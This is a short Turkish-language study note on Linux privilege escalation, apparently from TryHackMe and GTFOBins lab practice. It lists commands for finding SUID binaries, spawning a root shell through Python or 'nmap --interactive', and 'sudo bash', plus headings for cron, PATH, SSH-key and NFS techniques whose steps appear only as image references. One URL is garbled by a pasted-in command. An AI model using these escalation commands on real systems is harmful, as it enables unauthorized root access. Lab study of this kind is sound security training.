yetki yükseltme


images/94-1.png

yetki yükseltilebilecek dosyaları arama komutu


find / -user root -perm /4000

find / -user root -perm -4000 -exec ls -ldb {} \;

bir yetki yükseltme python komutu örneği;

usr/bin/python -c 'import os; os.execl("/bin/sh","sh","-p")'

kaynak: https://gtfobins.github.io/gtfobins/python/

bir başka yetki yükseltme komutu:

sudo bash

Privilege Escalation with Path Variable Manipulation

find / -perm -u=s -type f 2>/dev/null

Find all the SUID/SGID executables on the Debian VM:

find / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/null


https://www.siberportal.org/red-tefind / -type f -a \( -perm -u+s -o -perm -g+s \) -exec ls -l {} \; 2> /dev/nullam/linux-penetration-tests/linux-sizma-testlerinde-hak-yukseltme-yontemleri/

yeki yükseltme örnek-1 :

images/94-2.png


python -c 'import pty; pty.spawn("/bin/sh")'

images/94-3.png

find / -perm -u=s -type f 2>/dev/null

images/94-4.png

nmap --interactive

nmap> !sh


images/94-5.png


yeki yükseltme örnek-2 :


images/94-6.png

yetki yükseltme hedefleri tamamlandı

kaynak: https://gtfobins.github.io/

images/94-7.png


yeki yükseltme örnek-3 :

cron ve tar ile;

kaynak: https://tryhackme.com/room/linuxprivesc

images/94-8.png

yeki yükseltme örnek-4 :

images/94-9.png


yeki yükseltme örnek-5 :

PATH ile;


images/94-10.png


yeki yükseltme örnek-6 :

bash version <4.2-048 ise;

images/94-11.png

yeki yükseltme örnek-7 :

images/94-12.png


yeki yükseltme örnek-8 :

"hidden history files" ile ;


images/94-13.png


yeki yükseltme örnek-9 :

"config files" ile ;

images/94-14.png

yeki yükseltme örnek-10 :

"root_keys - SSH Keys, backups ile;

images/94-15.png

yeki yükseltme örnek-11 :

"NFS servisi ile remote user;

images/94-16.png

yeki yükseltme örnek-12 :

"Linux Exploit Suggester 2 ile;

images/94-17.png